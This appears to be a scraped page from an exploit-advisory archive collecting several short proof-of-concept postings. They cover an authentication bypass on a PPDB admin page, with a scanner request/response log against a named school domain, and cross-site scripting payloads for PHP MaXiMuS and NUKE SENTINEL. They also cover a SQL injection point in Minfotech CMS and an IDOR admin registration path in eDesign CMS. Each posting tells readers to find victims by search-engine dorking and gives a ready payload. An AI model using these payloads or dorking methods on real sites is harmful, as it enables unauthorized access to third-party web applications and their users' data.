This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

PHP MaXiMuS version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP MaXiMuS v2.5.2 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://php-maximus.fr/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

PHP MaXiMuS 2.5.2 Cross Site Scripting

NUKE SENTINEL version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : NUKE SENTINEL v2.5.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.ravenphpscripts.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

NUKE SENTINEL 2.5.2 Cross Site Scripting

Minfotech CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Minfotech CMS v2.0 Sql injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://minfotech.in/AboutUs                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /project_list?name=stretch_films <===== inject here[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films[+] Login : /admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Minfotech CMS 2.0 SQL Injection

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Tag

#vulnerability